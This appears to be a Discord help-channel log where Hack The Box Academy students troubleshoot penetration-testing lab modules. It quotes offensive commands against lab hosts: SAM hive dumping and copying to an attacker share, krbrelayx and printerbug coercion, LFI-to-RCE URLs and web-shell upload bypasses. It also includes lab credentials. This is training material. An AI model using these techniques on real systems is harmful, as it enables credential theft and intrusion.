#modules

boo

maybe reaching out to support

As far as I know, there is currently no solution to the problem

or submitting to /feedback

cool will do, thanks

I am currently doing NTLM relay attacks does anyone know if it is possible to recreate the attacks throught a pivot host? (executing responder and ntlmrelayx.py)

Hi everyone,
I'm doing the module "Pivoting, Tunneling, and Port Forwarding" . When I try to scan the other host with proxychains nmap -v -Pn -sT 172.16.5.19, I receive those messages:

...
dig: parse of /etc/resolv.conf failed
...

I can't complete the scan and after a few seconds, I see that my CPU and memory usage goes up to more than half. If I try multiple times, the PC crashes.
Has anyone experienced this error? Best regards and thank you very much.

i did not experienced this error but I'm curious about it. what does your /etc/resolv.conf looks like?

Hey there lads, I just finished the Module** Fingerprinting** on Information Gathering - Web Edition

I've got the second question right but with the wrong procedure, I wonder if there would be an easier way to do it, but here's how I did it.

||Run nikto on app.inlanefreight.com after modifying hosts file, the output spits out a couple of entries related to robot.txt

Just out of curiosity I check it out with

curl app.inlanefreightlocal/robots.txt

And I can see that the CMS is there, and it's a valid answer for the question ||

I feel that I should be able to grab the CMS through this command

curl -I app.inlanefreight.local

And check the X-Redirect-By value, but it's not being redirected at all, any other options?

thank you for your reply:

# Generated by NetworkManager
search fritz.box
nameserver 192.168.178.1
nameserver fd00::b2f2:8ff:fe6a:fad2
nameserver 2001:a61:a60:f301:b2f2:8ff:fe6a:fad2```

the command is trying to resolve an ipv6 address, but why? did you add those entries in the resolv.conf file? is it something you use for another purpose?

mmm no... Ive just removed all the lines and wrote nameserver 8.8.8.8 and now works. But I guess this solution will bring me later some other problems. Maybe it has something to do with proxychains.conf:

dynamic_chain
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 9050

mine is:
strict_chain
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 30000
tcp_connect_time_out 16000
[ProxyList]
socks4 127.0.0.1 9050

For the skill assessement of info gathering, does /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt is sufficiant to find the right VHOST ?

did you try it?

^

and my resolv.conf got
nameserver 127.0.0.1
and my nat address
but no external resolver
maybe it is not a reference since I messed with bind to set up a local dns for my home lab
but basically it is my nat that resolve the ip i want to reach

yes doesn't work

can you explain what does not work? do you get errors, no results?

Ok it was the vpn which was crashing unfortunately, it works now

Section* Fingerprinting

i think we don't need a vpn to connect to that host

Thank you for the response! I don't know what might be happening. Sometimes it connects, and other times it times out. Nmap tells me that all ports are filtered, and with xfreerdp I can sometimes connect.

Is it a vanilla config or did you configure things for your specific use? it is hard to diagnose a config from here, i would run nmap with trace packets, wireshark... it should run pretty straight forward with proxychains, but you got ipv6 addresses in resolv.conf, something happening there. Or maybe dynamic and strict at the same time it is curious

Enumerate web page of enumerated subdomain of another subdomain... is it realist ?

did you try it? : )

yes, I'm currently fuzzing directories without success, my only remaining question is the current API key

I removed dynamic_chain, added remote_dns_subnet 224, increase the timeouts. In resolv.conf I added nameserver 127.0.0.1 and it worked 😕 , so there is no more conflic with ipv6. Anyway, thank you for helping!

that question?: What is the API key in the hidden admin directory that you have discovered on the target system?

Sorry for the questions I have found the answer based on previous discord messages, there is so much guessing for this skills assessement

well at least you practice some osint skills : D

yeah ! This enumeration was a little bit guessy, some steps were obvious to do, some other...

the assessment brief tells all the steps to follow, maybe not totally in order... and the questions add another layer on what to search for. I do not know how to help if your only issue is you don't get the answers : )

<@&861185840277487616>

Nikto didn't work so well for me in this case. I simply browsed the site and found specific keywords. Later i realized whatweb tool works much better.

SQLMap Attack Tuning module

What's the practical way finding the custom prefix / suffix? I had 0 idea on how to find it for Case #6, looked up the hint and solved it. Now I'm wondering, what's the way to do this without looking at the hint? The solution doesn't provide this information.

anyone done with the last question on INFORMATION GATHERING - WEB EDITION - Skills Assessment

https://tenor.com/view/inception-deeper-go-deeper-we-need-to-go-deeper-leonardo-di-caprio-gif-16756828

yeah

https://academy.hackthebox.com/module/136/section/1291
**Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes) **

Managed to read flag.txt with XXE in svg.

Tried to use XSS in XML to read upload.php
Tried to use XXE to read /var/www/html/upload.php

I'm working on it now. Feel free to DM and discuss

Just a general question. When you use the 2&>1 after a command in Linux, what exactly are you doing? Redirecting stderr to stdout?

$ whatever 2&>1

Stderr AND stdout, you generally add a file after

For instance a program might just redirect stderr to a log file, while stdout to terminal (and/or file)

Gotchya, yeah I'm more or less familiar with how it's used, I just can never remember the syntax and I'm trying to break it down.

Like, for years I've switched where the & goes lol

https://www.gnu.org/software/bash/manual/html_node/Redirections.html

Hello If I subscribe the annual billing , I can access the module . when the annual billing has expire, Could I still access the moudle?

you maintain access modules you've completed.

Thanks!

Hello I am on the Pivoting tunneling and port forwarding module and I am tunneling with Chisel and when I scp the binary over to the pivot host and try to run it I get this error. ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
I also tried another version of Chisel

You'll want to use an older version of chisel

I have tried

well, that's the solution

looking back at my notes, i had to use v 1.7.4. have you tried that far back?

I went through github and went to the releases got the source code and unziped it then built it

I went as far as like 1.3

try 1.7.4

Will do

This worked for me

CGO_ENABLED=0 go build main.go

Good day mate👋

how much hahahah because I've expended almost 3h and nothing for while

some hint friend???

what have u done

can I text you private?

yessir

So i am working through the new content in the Information Gathering - Web Edition module. I am on the Skills Assessment, on the final question. I have found a couple of subsequent subdomains, but I can't do anything with the last one I found. It's like it can't connect to it. I have added it to my host file, I've tried resetting the VPN and the machine. I've tried FinalRecon, ReconSpider, Gobuster, and other tools and am getting nowhere. Anyone finished it recently that might be able to help?

im doing the Pivoting/Forwarding/Tunneling module. finally a module that i can use my networking knowledge from the JNCIA training i did lol

i haven't gone back to that module yet.

Aside from this last question it has all been relatively straightforward. This one is a doozy though.

All for it not to matter

ohi just noticed, it changed my name in here since identifying in the welcome channel ... interesting

haha, for what part not to matter? the JNCIA stuff? or the module?

It's linked to your htb labs username

JNCIA stuff

so far im a little surprised they havent explained subnetting a bit more, but i guess its not entirely needed. helps to understand networking architecture. i want to do the networking design course by Juniper. its on my list.

Intro to networking is the only module that covers subnetting

well ive found JNCIA to be helpful here and there. though it is juniper based, its far more applicable in general than CCNA imo

In terms of being an attacker, you don't really need to do subnetting, just be aware of them

As well as defense

it's good to know but you don't need in-depth knowledge

yea true. with the parts on why there is a jump host/pivot, makes perfect sense to me given the subnetting.

Just know you pivot because your host doesn't have access to the internal network

yea very true. i did my JNCIA as i thought it'd help me with moving towards purple teaming which is what i want, eventually.

Btw after this module, look into ligolo-ng, it makes all the pivoting simple

Even defensive side

You don't do a lot of networking in offense/defense

ive seen that name mentioned. will definitely take a look. i just got to the Socat stuff.

That's for the Network Admin to sort out and maintain

You just hook into the infra setup

yea true. i hope that it will serve me well when im producing real pentest reports, though. being able to identify weaknesses in infrastructure

You're not gonna be focused on the subnetting parts; maybe the subnets of a network to identify weaknesses

yea true

And generally you do it on a host by host basis not full network for the report

i have a use for the JNCIA in other areas anyway. it wasnt just for moving towards purple team

Though what CPTS asks for there's a sample report that you can go off of

i had a look at a dummy report from sysreptor but i havent looked at any others

have you done the CPTS yet, marcie?

Nope

Lots of stuff piled up in life at once and halted my progress

ah. you seem all over it, i wouldnt have been surprised if you had lol

yea i get that. im trying to do as much of this as i can, as i know i have life stuff coming my way very soon that will also grind me to a halt

so u are unable to see the webpage?

CPTS has been harder than i thought. im wondering if i should've started with CBBH lol

The only one accessible is inlanefreight.htb and has the Welcome message and that is it.

They wouldn't necessarily help with one another

The only thing that binds them is the surface level web stuff

make sure your hosts file is set up correctly

That's it

Information Security Foundations is the pre-req for Pentester path though

well i had a look at 1 of the free retired machines, and its heavy on the web exploits. but i was wondering if cbbh wouldve been better also because it is a shorter track

I have it set up with <ip>:<port> <domain>. Am I missing something there?

well ive done some infosec stuff at work, and added to it with security+ as well. so the infosec req didnt worry me too much

yes, u do not add the port to hosts file

CBBH focuses on surface level exploitation, boxes are meant to be rooted

Okay, I'll try that way

and any other sub domains u found you also add it to the hosts file

Yeah, that part I know

yea. that is true. i also know a good chunk of CBBH is covered in CPTS

Not to mention what's on boxes may not be covered by the course content

I wouldn't say covered, its just module overlap

thats what i meant

I.e. you don't need to do a module again if you do both CPTS and CBBH

Looks like it was the port that was screwing everything up. Thanks!

The hosts file shouldn't have ports in it

It's why all the examples and such still specify port after domain http://inlanefreight.htb:port

Yeah, not sure what got me putting the port in because I usually don't

im trying to use rpivot. has anyone had any luck install python2.7 on a parrot OS VM?

Use a venv (virtual environment)

for python2.7 i use pyenv to manage versions

do you have a link to how you got that done? that doesnt seem to work for me either

Google

https://stackoverflow.com/questions/32918846/how-do-i-install-a-previous-version-of-python-into-a-virtualenv

awesome. i went with pyenv. setting up 2.7 now

then, with some aliases, it become pretty neat

i followed along and added the paths t .bashrc and .profile

seems to work with just python2.7 command

If you edit the .bashrc file you'll need to do source .bashrc or reopen the terminal to get it to register

Hey guys I am working through "ATTACKING COMMON SERVICES - Attacking SQL Databases" module and I cant connect to mssql with:
mssqlclient.py -p 1433 htbdbuser@10.129.203.12
tried adding : -windows-auth at the end to but nothing seems to be working. I get this error with TLS :
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]

Can anyone help with some hints please, been stuck on this for 2 days now?

Is your openssl up to date?

Also no need to specify port

now the client.py won't run on the pivot host. no relay module.

lol

Follow the section for setting it up

You likely missed a step

ah, send the whole directory not just the file...

I am using HTB machine so it should be. Let me check the steps all over again

i like rpivot though thats a lot of stuff to send over to your pivot host. i'd assume it'd get noticed

cool though

Yeah it's not working for me

Seems some packages got broken

well that sucks

sudo pip install impacket --upgrade --break-system-packages

I'd not worry too much about getting noticed... i got into some evasion rabbit hole around the same time in pivoting...

i guess im thinking too far ahead for an engagement

for training it wouldnt matter

that fixed it! Thank you so muchhhhh! You saved me ❤️

it seems something must have broken when they updated the pwnbox images

Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.

Guys am confused how to do this? am using dnsenum to find the missing subdomains but am confused whether i should create the wordlist by myself or what should i do?

have you tried it?

yes i did tried to do so

but am confused

you should use a premade wordlist

like the one in {path}/SecLists/Discovery/DNS/

or whatver is shown potentially by the section/module

That's exactly where I am. I've got the correct info in the hosts file (ie just the name and IP) but I can't find any vhosts or subdirectories with either gobuster or ffuf. I've tried the medium directories list and subdomains-top1million-110000.txt for the vhosts.

you could try the command in the section

i did that but not getting answer

then you're likely doing something wrong ™️

because inlanefreight.com is a live website, it's not the target

are you setting too many threads and it's just dropping all them, are you just being impatient

dnsenum --enum inlanefreight.com -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
am using this

is the section telling you to use dnsenum?

no am only using threads to enumerate vhost using gobuster

it also helps if you provide the module name and section name

yes

and not just the question

but they want answers

asking questions correctly helps avoid confusion ¯_(ツ)_/¯

yeah you are right, i was just joking

but it seems you know the module he's on

the section contains all you need, just try the commands

i had to search but it is https://academy.hackthebox.com/module/144/section/1253

the walkthrough also shows using that same command

so

could you tell more on what's happening?

is your host files correct (ip then domain name)

not port

I can hit the server at the IP and port provided, retrieve what http server is running. The next question mentions a hidden admin directory so I've tried directory fuzzing but I just get the same welcome to inlanefreight.htb page

just ran it and found it just fine

if you're using the pwnbox the new file location is lowercased now; instead of SecLists it's seclists

i noticed because the error i got was "make sure file exists"

Same location on my Kali box

wasn't referring to you

just out of curiosity, the other day i tried without adding the subdomains to etc/hosts and it works for that part, we can retrieve the subdomains

i was replying to the person regarding something else

it depends on the tool used

i also corrected the same thing with the command

ffuf doesn't matter because you throw the -H "" flag at it

still not getting

paste the command you are using. do you get any errors while fuzzing?

works with gobuster as well, but anyway we have to add the subdomains for later in the assessment so it is not a big deal

do inlanefreight.htb:port instead of IP

OK.

hey you will not get subdomains with that command

you are fuzzing for directories there

but also that's not how you get subdomains yeah

fuzzing for subdomains with ffuf would be -H "FUZZ.inlanefreight.htb" with the discovery/dns/ wordlists from SecLists

you'll have to check on subdomains

Yeah, I've tried for both subdomains and directories

Was what I used for subdomains

ffuf -u http://134.209.24.248 -H "Host: FUZZ.inlanefreight.com" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
is this correct?

if you add the port it will be correct

^

you need the port dude otherwise it assumes 80

make sure to add the port

if one wordlist doesnt find anything try a different one

if you go back to the course material and try the different wordlist shown there, you'll find the subdomains

Hey! When I'm executing ReconSpider.py from the updated module (Web edition) I get this error, there is the output. Any one get the same error?

did u try http://inlalnefreight.local

I tried with https://inlanefreight.local, http://inlanefreight.local, http://inlanefreight.com, 😦

yeah all of them

yes same here, it works nonetheless

and instructions says you need to crawl inlanefreight.com. So what?

well it still shows it ran so have u checked the results?

check the results of reconspider

ah i didnt see the end of your file, you got this error PermissionError: [Errno 13] Permission denied: 'results.json'

¯_(ツ)_/¯

ok nvm ty

it should be run on inlanefreight.com

so it seems you are in a directory where reconspider cannot write

not local

but yeah

thanks all for help lol my fault haha

just did the info gathering assessment

not a bad glowup from previous iteration

yeah the focus is different i guess

Def would have liked them to still show whatweb off again

also was wappalyzer also not showing the CMS for you on the fingerprinting section? I managed to get it from other means (whatweb/source/looking at page generation)

Comrades, good morning everyone, I have a problem in the password attack module, specifically in atancado sam, the question is the following: "Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer." I have the share and I have saved the files as indicated in the guide but when I move them it tells me the following: The system cannot find the file specified. The command to move them I have it as follows: move sam.save \<ipattackerHost>\hashesHklm but I don't understand why it doesn't move the files to my machine

do you have an smb fileshare open?

also with xfreerdp you do have the /drive: option to mount a drive

yes sometimes wappalyzer doesnt show cms, if i remember correctly, sometimes it does tho

¯_(ツ)_/¯

I knew how to find it out (it's a rehash of the previous version anyway)

@fathom pendant xfreerdp /u:Bob /v:10.129.149.175 /p:HTB_@cademy_stdnt!

you can add /drive:share,/tmp/ to mount the /tmp/ directory and you'll see it from the shares in file explorer

Here we go again 🙂

I also suggest doing /dynamic-resolution so you can resize the screen

also "cannot find the file specified" did you extract the sam.save to be able to move it?

i found that extension: owasp penetration testing kit. it shows quite a lot but it is a bit cluttered

i like my CLI tools ¯_(ツ)_/¯

they haven't let me down yet

@I extracted it as indicated and he tells me that it has been done successfully

ok is it in the directory you're currently in to move it

yeah whatweb is just easy

but again my initial question wasn't answered

C:\Windows\system32>

do you have an smbserver running for windows to connect to and drop

I got it set up and running

that's what it's refferring to with move file \\your_tun0\sharename\file

Wait I've gotten lost again

the \\<attacker_ip>\ is YOUR IP

on that, i think now the module focuses more on what useful for an htb environment than searching shodan, censys, and real dns records

i thought u had to do this first net use \\your_ip\sharename

you don't have to

move sam.save \<ipTarget>\hashesHklm

bruh ive been doing that the whole time T-T

you can just specify the remote target

not iptarget

tun0

YOUR tun0 ip

\\10.10.x.x\<whatever you named the share>\

your tun0 refers to the IP given when you do ip a on your attack host

I'm going to try again when it comes

Hello there,
I am doing linux fundamentals and i am at a point were i cant find the user's mail. I was able to discover the /var/mail and the var/spool/mail directories but didn't contain anything for the user and as such they were not passed. Any pointers...

check env

it's where it's defined

let me get on it. thanks

note: it can be defined in the environment but not exist on the filesystem

then it's just hidden with a . preceding its name..!

nope

if i meant hidden i would have said hidden

env gives all the environment variables; MAIL is one of those variables

also make sure you're ssh to the target

otherwise you're not gonna find the answers

yes, i have. Just trying to wrap my head around the environment variable. it must be saved somewhere on the system. I just have to find where

brother

i'm telling you the command that will print them out

the environment variable defines the file location for it

you don't have to dig through the filesystem for it

you're overcomplicating it

🙀shame on me. I'm back in. and i am looking at the path

VAR=/path/to/thing

An environmental variable in Linux is a way for your computer to store information it needs to work. Think of it as a note with important details, like where to find programs or files. For example, the PATH variable tells the computer where to look for commands you type. You can see or change these variables to control how things run.

thanks

inlanefreight.com NS record query failed: SERVFAIL
Guys am getting this error on Information Gathering - Web Edition -> subdomain bruteforcing
am using dnsenum --enum inlanefreight.com -f /usr/share/wordlists/seclists/Discovery/DNS/<every wordlists>

sure will do, will try again soon

yeah am aware of the dot issue 🙂

haha yup did do that

does it happens with every wordlist? I just tried with one and it works fine

Try explicitly specifying a DNS server?

which one did you use? i tired with every wordlist

there is 3 wordlists used in that page of the course material, they say let's use the 5000, then the code shows the 110000 and then another example is the 20000. I think you can figure it out from there. But that does not solve your servfail issue

how to solve servfail issue?

did you try what candy29 just proposed a few message above?

yes i tried with 110000 txt, 20000 txt and 5000 txt

still getting servfail issue

do you think the servfail issue might be wordlist related?

just try to google the error

am trying

is it due to rate limit?

me too, and i don't know really why you get that error. Did you try to specify a dns server that dnsenum will use?

naah am using
dnsenum --enum inlanefreight.com -f <path to wordlists?

Oh

Try specifying one dnsenum --dnsserver 8.8.8.8 --enum inlanefreight.com -f <wordlist>

thanks it did worked, what about vhost now
how to solve this am using
gobuster vhost -u http://<ip>:port/ -w <path to wordlists> --append-domain
am not getting answer

am using seclists wordlist

what are you getting?

i am stuck at Web Attacks - Skills Assessment. now i know a user who may be an admin but i can't change the password for him any hints？

I am having an issue on Password attacks hard skill assessment where I have the password NT hash of the Administrator from the vhd and it seems to be an empty string, also tried PtH with no success

am not finding anything

what should I do

you could try to see if there is any missing flag in your command using:

gobuster vhost --help

can i dm you?

yeah go on

Footprinting lab - Hard
When I look up help on this anywhere, the first thing I read is about how SNMP should be looked into, my question is, how should I come to the conclusion that SNMP is running at all? My nmap scan outputs this

you nmap scan is a tcp scan, but snmp runs on udp, so you need to perform a scan with -sU flag

holy i forgot ty

ideally you always scan both, in 99% of the cases you only care for the tcp ports though. I keep forgetting udp scans most of the time too

did you find the issue?

I did not haha my internet started acting up

what do you mean by empty string?

When cracking the NT hash found in the vhd it is just an empty string

strange, should be a password. when i google "hashcat empty password", there is several things possible. Maybe missmatching the type? check the potfile, or output results to a file

I tried with crackstation and it also came back as empty

is you hash like e53...22a1

na its something like 31d...9c0

also all users I found in the vhd have the same hashes

you probably got the wrong hash then

that s guest hash

The guest and the admin are both the same for me for some reason

you must be damned

haha I'll look into it some more maybe some issue with me dumping them or mounting it!

Thank you though!

hey

1. Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress.
2. On which operating system is the dev.inlanefreight.local webserver running in the target system? Respond with the name only, e.g., Debian.
   am having issue on this question from Information Gathering - Web Edition -> Fingerptinting

I used curl -I http://<ip> to find the cms, whatweb but didn't find the cms
and used nmap -O <ip> to enumerate the OS still not getting anything

did you add all the virtual hosts in the /etc/hosts file?

yes i did

am not being able to get OS

is the site down for any1 else?

Yeah its down

i had 1 section left before skills assessment. i wanted to get it done then go to bed, lol.

yes, here as well

The site is offline?

ok cool. good to know.

seems like that. for me also

ah now it is up again

they changed the default terminal from the parrot machines. nice..that green was always horrible for my eyes...

is there a way to send feedback for modules ?

Via /feedback I guess

like in the pivoting module, when we discover IP 172.16.5.129/23 the author mentions to do ping sweep via metasploit using 172.16.5.0/23. However this is incorrect because the network address for the host is 172.16.4.0/23, not 172.16.5.0/23. This detail is pretty important imo, as with the instructions provided it could lead to missing discovereable hosts during a ping sweep.

Is the point of this to make students not bother with basic subnnetting ? big mistake if that is the case imo and should be clarified

Oh ok thx 🤝

I did that section today. I didn't have any problems with that tbh. But you're right about the subbetting. I mentioned it earlier today.

Personally I think NetworkChuck does some great explanations of subnetting

excellent good to know someone mentioned it, hopefully they fix it

Probably wont

Hopefully ppl take it upon themselves to learn though

Hi
I finished File Uploads: Whitelist Filters, but cant understand one thing.
In this module i can successfully upload file extension sell.php/.jpg or shell.php..jpg. What must be written in uri, for get access to this file?
I try different combinatiob http://x.x.x.x/…./shell.php, shell.php.jpg, shell.php/.jpg, but always get “Not Found”

I can't get HTB to accept an answer for the Using CrackMapExec -> Basic SMB Reconnaissance module / section. The question is What's the OS version, and this is the output from crackmapexec SMB 10.129.204.177 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:inlanefreight.htb) (signing:True) (SMBv1:False), I've tried every possible combo of that version with no success

Was doing 'DNS Tunneling with Dnscat2' in the Pivoting module.

Anyone else had issues with the connections "timing out" when connecting from the windows host back to the LOCAL DNS. Dunno if its because I put dnscat2.ps1 in C:\ or something, I did manage to use it correctly as the module says but the connections didn't seems to last for very long if they were idle for more than like 30 seconds.

Anyone done advanced sqli skill assessment that I can message about the RCE?

Huh

is it me or the target for the questions in "Windows File Transfer Methods" is EXTREMELY unstable?

It's sluggish and freezes for a moment at times... more-or-less. Apparently more for you.

yeah it kinda unf--ks itself after a while..

Hi, where can i go to for hints for CTF HTB Try out.

nowhere

there are no hints for CTFs allowed

anyone did the citrix section in windows priv esc module. do i just click on the launch.ica file and it will automatically connect?

yes

You won’t find the answer in usn journal but in the mft

another hint i've seen floating around that one is, assume the Zone.Identifier is the same

they gave files to download and read the codes but its encrypted and im unsure whats the password to extract the files

i try that...should i open the mft in timeline explorer, read something about that in a reddit forum...

Sure, so that and look for zone identifiers and see if you notice anything

that's too bad, but there's no one that can help you with an active CTF

read the #rules and #welcome

if you really want to keep asking post in #1024429874246590575

nah dont get it. can you help me a bit more specific? which file o have to open in timeline explorer?

this $MFT converting to a csv and read iwth timeline right?

I've read in a lot of forums, including Reddit, that many people have trouble with this question. It seems to be poorly explained

if anybody likes to help me, just dm me!

because i am off now

i just want to end the module that i can give a bad review really...

It's likely you're just overthinking it

1 star for sure

once you find it you'll feel dumb more than likely ¯_(ツ)_/¯

You're already told to look for the Zone Identifier

where?

in time line explorer? when loaded the mft csv?

In both usn journal and the Explorer. I'm assuming the section and module taught you how to look for that info

You should have a csv for both the journal and mft

i do have that

if you have the Zone.Identifier, you can locate the renamed file

Then search for "uninstall.exe"

the Zone.Identifier will stay the same across renames

i have this

is the answer in mft explorer or in the timeline exlporer?

In the nmap module it is mentioned that nmap normally uses ARP ping, but the most reliable method is ICMP echo ping and we have to use --disable-arp-ping to do the ICMP ping, but i tried this and my nmap normally uses ICMp ping, i am a little confused here? did i understand it wrong? please help

Nmap uses ICMP for host discovery, it's why you use -Pn to disable it when scanning targets that wouldn't respond

so what about the ARP ping the module mentions?

That's a backup method

how?

i dont know the method. are you able to help more?

hmm, thnx

if the Zone.Identifier stays the same across renames, then the renamed file and the original file will have the same Zone Id

https://nmap.org/book/host-discovery-techniques.html

and how can i search for it?

where can you find a log of changes made to files

timeline explorer

what artifact can you check for file changes

timeline explorer has a search feature, use that and you have your answer

not wihin the $J file right?

i found only this

uninstall.exe:zone.identifier

found it

searched for uninstall.exe

not zone identifier

i still dont get what zone identifier helps...

i just searched for uninstall.exe

Ok let's take a step back

Take a look at the journal for uninstall.exe, and look for the zone.identifier there

Then in the mft one look for that

You need to examine both

Your account number is not valid. Please update your account number.

where do i update this?

Message support ig

i cant see the chat anymore

live chat, did they remove it?

Disable adblock

oh ok

is it 24/7?

No

so there is no way for me to fix this myself?

¯_(ツ)_/¯

maybe its the card thats expired, i cant renew my student subscription

still a weird message to get

Support is the best place to resolve issues

for sure

Not the discord

dont know what you mean

In both files, search uninstall.exe

In one the filename field will be different even though the zone.identifier is the same

I am doing InfoSec fundamentals , I want to have skin in the game with Linux what distro would be the best I heard fedora it's good? Just to get more hands on working with Linux and getting used to Linux what do you guys suggest?

I don't know what part of the output of this command (view-source:||http://94.237.53.113:41835/index.php?language=/var/lib/php/sessions/sess_pe5tsqscr937shm045cem83je1&cmd=pwd||) Im supposed to submit as an answer in the first question for the following module section. I tried multiple attempts:

https://academy.hackthebox.com/module/23/section/252

"Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd "

i just have made the csv file out of the mft file. searched for Zoneidentifier=3

and that's it. but i dont know...i thought at he beginng this hasn't worked...

Debian

Or Arch

Fedora is Redhat, not as common. Debian distros are more common like Kali or Parrot

anyway. thx

Don't do zoneidentifer=3

i am off

Just ctrl+f for uninstall.exe

question about the "Kerberos Attacks - Unconstrained Delegation - Users" module. Working on the krbrelayx portion and curious how you're supposed to get the hash to use for the exercise? I've tried to just use "-p" to set a password and auth to it that way. but nothing seems to be working

┌──(testing㉿kali)-[~/tools/windows/krbrelayx]
└─$ python krbrelayx.py -p jasmine
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.205.35
[-] Could not find the correct encryption key! Ticket is encrypted with keytype 23, but keytype(s)  were supplied
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

getting the above error

can anyone help me with the last two questions from information gathering skill assessment

┌──(a㉿kali)-[~/tools/windows/krbrelayx]
└─$ python3 printerbug.py inlanefreight.local/carole.rose:jasmine@dc01.inlanefreight.local roguecomputer.inlanefreight.local
[*] Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attempting to trigger authentication via rprn RPC at dc01.inlanefreight.local
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

printbug exploit

dont you need to provide the user here too?

sigh... yup that was it

thanks

hello all,

AD attack and enum
ACL abuse primer question2

" Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? "

does not accept my answer

What did you put?

I am extremely disapointed with one of the mods

poor communication and just locked down my erratum ticket

said to seek help here which is not the case

If you have an issue with mods reach out to an admin

But if your question was related to an academy module, ask here

but I will ask my question here I guess
Module Name: WINDOWS ATTACKS & DEFENSE
Section Name: Credentials in Object Properties
Event 4771 does not get populated thus not able to answer the last question

It was closed because it's not a reproducible error

dacl -_-

yeah that is fine

Are you looking at the right server?

DACL isn't an ACE entry

but I need the event id 4771 to answer the questions

It's more Generic

Yes. But are you looking at the right server for the event

I am

Hey the Windows Evasion module, I am trying to generate an IV using this command:

for ((i = 0; i < ${#hexRandom}; i+= 2)) do echo -n "0x${hexRandom:i:2},"; done | sed 's/.$//'; echo

but I keep getting this error:

zsh: unrecognized modifier `i'

looking on DC1

The event gets logged on the key server

Do I have to set 'i' as a variable?

Connect to DC1 as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the TargetSid of the bonni user?

this is the question

In the for loop you need to call the variable with $

It's set in the loop generation, you're just not calling it

It's not like python where naming a variable makes it implicit wherever the variable is called

Bash/zsh requires a variable to be called with $

So in this case $i

I tried that and got this error: zsh: bad math expression: lvalue required

also you cannot even rdp into a PKI server

just powershell in

also the questions specifically says DC1 that is why I am looking on dc1

so either I am trippin or the question is wrong or this is actually an erratum issue

Did you attempt the bonnie login?

Carefully go through the material in the section and you will get the answer

don't rush through it

4771 is an auth failure

I have gone through it like 3 times

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771

you really think I am rushing through it

Well it wasn't reproducible

XD

So message support ig

that is fine that is supposed to be the event id

Since others aren't able to reproduce the case where the event id isn't populating

4771 but it is not populated and he sent me a screenshot and covered the date

like I also have 4771s but they are from the old date

and are mostly dc2 related

so I dont know if his are from the newer date or older date

@autumn pilot ease this man's worries

Since he's convinced he's being psyoped regarding this

hint - keep it simple

I am not convinced but like why the poor communication I dont get it, keep it simple is not a hint I have followed every single step of the instructions, anyways

Erratum is channel created to report issues within the content, the topic you raised in #1234357888114364508 is not an issue with the machine

Mods aren't staff and aren't obligated to give you any hints

alright anyways

Additionally, you can use the discord search feature to look for students that have had similar questions related to the exercise/section which you can use for your advantage

it is what it is

Currently you are not accepting neither the feedback, nor the hint to keep it simple and that won't yield you with anything to solve the exercise

When you get stuck with a question/exercise a rule of thumb is to ask an appropriate question on how to get yourself unstuck

The more one pushes himself into developing a question and expressing what he has tried will result in getting unstuck and running through the exercise

looking for some help on the "Using Metasploit Framework" modules - on two different questions & machines msfconsole is failing to launch the exploit, nmap & ping scans fail to get any traffic back. I have respawned the machines several times & tried on various different days - am I missing something other than a technical glitch?

the problem is the same question was asked by others

and was also not helped with in a helpful way

like I am trying to get unstuck

I look in the security logs of windows

and nothing, I followed every step

kinda hard to say... which sections? most likely if the problem persists even after respawns and several days interval, it should not be an infrastructure issue

module/39/section/415

deargod, i need a map now

Module name is better than the endpoint uri

If you are not finding the event, then you are missing a step

sorry new to this

okay, so I copy and pasted the script, I imported it as a module

Using the Metasploit Framework > Sessions & Jobs

I ran the function

it gave me the password

I rdpd into the machine with bonni

and the password

I just did it and it worked for me

¯_(ツ)_/¯

what the heck man

i set all my options appropriately, i alos cant even navigate to the webpage for the machine

S...4 Is her password

yes I know

I rdp

with that password

i'm spawning the box...

Did you spell her username right? bonni not bonnie

yes bonni

¯_(ツ)_/¯

I will send you a screenshot

Well it worked on my machine

I right clicked security, filter view entered in 4771 and boom there it was

as you can see, about to do it again

After it fails, switch the user to htb-student and then log in?

yes

and go to security event of microsoft

I mean windows logs

idk what to tell you man ¯_(ツ)_/¯

so now I go to the events

from here i see the webpage

yeah i just DL a new VPN pack, cant even connect now

this is the issue i'm having on multiple MSF modules

Did you close your old vpn connection?

yes

and restarted the machine

as you can see nothing for today's date

and not of these are for bonni

did you manage to look at the webpage source code to know which exploit to use?

Well yeah

not when my VPN was working - page unreachable

Change vpn regions, reset the target, try again

got you

will do that, should I try American servers?

or EU will do?

